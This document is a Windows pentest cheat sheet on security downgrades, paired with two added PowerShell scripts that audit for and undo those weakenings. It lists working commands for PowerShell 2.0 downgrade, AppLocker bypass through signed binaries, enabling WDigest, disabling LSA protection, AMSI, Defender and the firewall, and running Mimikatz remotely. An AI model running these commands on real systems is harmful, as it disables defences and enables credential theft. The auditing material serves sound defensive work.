L - Security Downgrade

This app has been blocked by your system administrator !!!

CHECK WHERE YOU CAN DROP YOUR BINARY

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

CHECK POWERSHELL LANGUAGE MODE

$ExecutionContext.SessionState.LanguageMode

POWERSHELL VERSION DOWNGRADE

# CHECK IF OLD VERSION STILL ACTIVATED
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
# ABUSE
powershell.exe -version 2.0

Constrained Language mode was introduced with PowerShell 3.0; as long as the PowerShell 2.0 engine is still enabled, it can easily be bypassed by simply starting the older engine.

  • Cannot run a .ps1?
    • Include your function inside the .ps1 and exec .\script.ps1
    • rundll32.exe .\your.dll,Void
    • REGSVR32 "C:\PATH\your.dll"
    • .NET C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\PATH\Bypass.exe

CHANGE LANGUAGE MODE

  • POWERSHELL COMMAND

    $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
    # Note: you can switch a session to a different mode, but once it is in ConstrainedLanguage you cannot change it back.
  • REGISTRY PATH

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
    • KEY
    __PSLockdownPolicy
    • POSSIBLE VALUES
    Data 1 : FullLanguage
    Data 2 : RestrictedLanguage
    Data 3 : NoLanguage
    Data 4 : ConstrainedLanguage
  • SYSTEM ENVIRONMENT VARIABLE

    Control Panel / System & Security / System
    System Properties
    Environment Variables
    New
    __PSLockdownPolicy
    Value X
    
  • Group Policies

    User Configuration
    Preferences
    Windows Settings
    Environment
    Set your variable __PSLockdownPolicy via GPO
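The checks above (AppLocker rules, session language mode, the PowerShell 2.0 engine and the __PSLockdownPolicy value) are what a defender audits to close the downgrade path this section describes. The script below is an added example, not part of the original cheat sheet: it reports each weakened setting and, with -Remediate, restores the hardened value. It assumes an elevated local session, the registry key and value names listed above, and that the Windows optional-feature and AppLocker modules are available on the host.

```powershell
# Added example (not from the original cheat sheet): audit the PowerShell
# downgrade surface described above and optionally remediate it.
# Assumptions: elevated local session; registry key, __PSLockdownPolicy and the
# feature name are the ones the cheat sheet lists.
param([switch]$Remediate)

$findings = @()

# 1. PowerShell 2.0 engine: "powershell.exe -version 2.0" only works while it is enabled
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
if ($v2.State -eq 'Enabled') {
    $findings += 'PowerShell 2.0 engine is enabled (Constrained Language can be bypassed with -version 2.0)'
    if ($Remediate) {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -NoRestart | Out-Null
    }
}

# 2. Language mode of the current session
$mode = $ExecutionContext.SessionState.LanguageMode
if ($mode -ne 'ConstrainedLanguage') {
    $findings += "Current session language mode is $mode"
}

# 3. System-wide lockdown value (same key and value the cheat sheet lists; 4 = ConstrainedLanguage)
$envKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
$policy = (Get-ItemProperty -Path $envKey -Name '__PSLockdownPolicy' -ErrorAction SilentlyContinue).'__PSLockdownPolicy'
if ($null -eq $policy) {
    $findings += '__PSLockdownPolicy is not set'
} elseif ("$policy" -ne '4') {
    $findings += "__PSLockdownPolicy is '$policy' (4 = ConstrainedLanguage per the table above)"
}
if ($Remediate -and "$policy" -ne '4') {
    # String value "4"; new sessions pick it up after the environment is refreshed (or a reboot)
    Set-ItemProperty -Path $envKey -Name '__PSLockdownPolicy' -Value '4' -Type String
}

# 4. Effective AppLocker rules: no rule collections means nothing restricts where binaries run
$rules = (Get-AppLockerPolicy -Effective).RuleCollections
if (-not $rules) {
    $findings += 'No effective AppLocker rule collections'
}

if ($findings.Count -eq 0) { 'No downgrade findings' } else { $findings }
```

Because __PSLockdownPolicy is an environment variable, it only hardens sessions that start after it is set; a session that is already in FullLanguage is unaffected, and the check in step 2 therefore has to be run from a fresh session to be meaningful. Disabling the 2.0 engine is the control that actually removes the "-version 2.0" path, since the environment variable has no effect on that engine.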

MIMIKATZ ERROR kuhl_m_privilege_simple

# NEED SeDebugPrivilege
# Group Policy Management Editor -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs -> Define these policy settings

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# ENABLE WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# DISABLE LSA Protection
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0

MIMIKATZ ERROR kuhl_m_lsadump_secretsOrCache

# Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 10

Disable AMSI

# LOCAL
Set-MpPreference -DisableIOAVProtection $true
# Remote
$sess = New-PSSession -ComputerName websrv.domain.local
Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
# REMOTE MIMIKATZ
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

DISABLE WINDOWS DEFENDER

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

REMOVE WINDOWS DEFENDER

Uninstall-WindowsFeature -Name Windows-Defender

DISABLE FIREWALL

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Set-NetFirewallProfile -Profile * -Enabled True
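Every "fix" in the MIMIKATZ, AMSI, DEFENDER and FIREWALL sections above leaves a persistent setting behind that a defender can check for. The script below is an added example, not part of the original cheat sheet: it reads the WDigest and RunAsPPL registry values, the two Defender preferences and the firewall profile state listed above, and reports each one against its hardened value. It assumes an elevated local session with the Defender and NetSecurity modules present; the hardened defaults assumed for a missing registry value are marked in the code.

```powershell
# Added example (not from the original cheat sheet): report the weakened
# settings the sections above leave behind. Assumes an elevated local session;
# registry paths and value names are the ones the cheat sheet lists.
$checks = @(
    @{ Name = 'WDigest plaintext credential caching'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Value = 'UseLogonCredential'; Expected = 0
       Default = 0 }   # assumption: missing value means the OS default (off on current Windows)
    @{ Name = 'LSA Protection (RunAsPPL)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA'
       Value = 'RunAsPPL'; Expected = 1
       Default = 0 }   # missing value means LSA protection is not enabled
)

$report = @(foreach ($c in $checks) {
    $actual = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
    $effective = if ($null -eq $actual) { $c.Default } else { $actual }
    [pscustomobject]@{
        Check    = $c.Name
        Actual   = if ($null -eq $actual) { "(not set, effective $effective)" } else { $actual }
        Expected = $c.Expected
        Status   = if ($effective -eq $c.Expected) { 'OK' } else { 'WEAKENED' }
    }
})

# Defender preferences: the Set-MpPreference lines above flip these to True
$mp = Get-MpPreference
foreach ($pref in 'DisableRealtimeMonitoring', 'DisableIOAVProtection') {
    $report += [pscustomobject]@{
        Check    = "Defender $pref"
        Actual   = $mp.$pref
        Expected = $false
        Status   = if ($mp.$pref) { 'WEAKENED' } else { 'OK' }
    }
}

# Firewall profiles: any profile with Enabled = False is a finding
foreach ($p in Get-NetFirewallProfile) {
    $report += [pscustomobject]@{
        Check    = "Firewall profile $($p.Name)"
        Actual   = "$($p.Enabled)"
        Expected = 'True'
        Status   = if ("$($p.Enabled)" -eq 'True') { 'OK' } else { 'WEAKENED' }
    }
}

$report | Format-Table -AutoSize
```

Run it from the same elevated context the cheat sheet's commands use, since Get-MpPreference and the HKLM reads need it. A row marked WEAKENED maps directly to one of the commands above (UseLogonCredential = 1, RunAsPPL = 0, a Disable* preference set to True, or a disabled profile), which is also the state to alert on in configuration monitoring rather than only after the fact.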
